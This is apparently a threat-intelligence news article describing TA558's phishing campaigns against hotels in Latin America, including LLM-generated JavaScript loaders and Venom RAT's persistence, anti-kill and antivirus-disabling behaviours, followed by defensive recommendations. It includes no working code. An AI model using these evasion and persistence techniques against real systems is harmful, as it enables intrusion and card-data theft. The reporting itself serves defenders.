The cybercriminal group known as TA558 has recently intensified its operations, targeting the hospitality sector in Brazil and Spanish-speaking regions. Utilizing advanced techniques, including artificial intelligence (AI)-generated scripts, the group has been deploying remote access trojans (RATs) like Venom RAT to infiltrate hotel systems.
Background on TA558
Active since at least 2015, TA558 has a history of targeting hospitality, hotel, and travel organizations, primarily in Latin America. Their primary objective is to install malware on compromised systems to steal sensitive information, particularly credit card data from guests and travelers. This data is often obtained from hotel systems and popular online travel agencies (OTAs) such as Booking.com.
Evolution of Attack Methods
Initially, TA558’s campaigns involved phishing emails with malicious attachments like Word, Excel, or PDF documents. These attachments exploited known vulnerabilities in Microsoft Office, such as CVE-2017-0199, to deploy various RATs, including Revenge RAT, NjRAT, NanoCoreRAT, and 888 RAT. Over time, the group refined its tactics, incorporating a broader range of malware like Agent Tesla, AsyncRAT, FormBook, GuLoader, Loda RAT, LokiBot, Remcos RAT, Snake Keylogger, and Vjw0rm.
Current Campaigns and AI Integration
In their latest campaigns, observed in the summer of 2025, TA558 has been sending phishing emails written in Portuguese and Spanish. These emails, often disguised as hotel reservations or job applications, trick recipients into clicking on malicious links. This action downloads a WScript JavaScript payload, which appears to be generated by large language model (LLM) agents. The script’s heavily commented code and format are indicative of AI generation.
The primary function of this AI-generated script is to load subsequent scripts that facilitate the infection process. This includes a PowerShell script that retrieves a downloader named cargajecerrr.txt from an external server. This downloader then fetches two additional payloads: a loader responsible for launching the Venom RAT malware.
Venom RAT: Capabilities and Deployment
Venom RAT, based on the open-source Quasar RAT, is a commercial tool available for $650 for a lifetime license. A one-month subscription, which includes HVNC and Stealer components, costs $350. The malware is designed to siphon data, act as a reverse proxy, and includes an anti-kill protection mechanism to ensure uninterrupted operation.
To achieve this, Venom RAT modifies the Discretionary Access Control List (DACL) associated with the running process, removing any permissions that could interfere with its functioning. It also terminates any running process that matches specific hard-coded processes.
Additionally, the malware sets up persistence on the host by modifying Windows Registry entries and re-running itself whenever the associated process is not found in the list of running processes. If executed with elevated privileges, Venom RAT sets the SeDebugPrivilege token and marks itself as a critical system process, allowing it to persist even when termination attempts are made. It also prevents the computer from entering sleep mode by keeping the display on.
Furthermore, Venom RAT can spread via removable USB drives and terminate processes associated with Microsoft Defender Antivirus. It can also tamper with the task scheduler and Registry to disable security programs.
Implications and Recommendations
The integration of AI-generated scripts into TA558’s attack vectors signifies a concerning evolution in cybercriminal tactics. By leveraging AI, these actors can automate and enhance their phishing campaigns, making them more convincing and harder to detect.
Organizations, especially those in the hospitality sector, should be aware of these advanced threats and take proactive measures to protect their systems. This includes:
– Employee Training: Educate staff about the latest phishing tactics and the importance of scrutinizing unsolicited emails, especially those containing links or attachments.
– Advanced Email Filtering: Implement email security solutions that can detect and block phishing attempts, even those using AI-generated content.
– Regular System Updates: Ensure that all software and systems are up-to-date with the latest security patches to mitigate vulnerabilities that could be exploited by malware.
– Network Monitoring: Deploy network monitoring tools to detect unusual activities that may indicate a breach or malware infection.
By staying informed about the evolving tactics of groups like TA558 and implementing robust cybersecurity measures, organizations can better defend against these sophisticated threats.
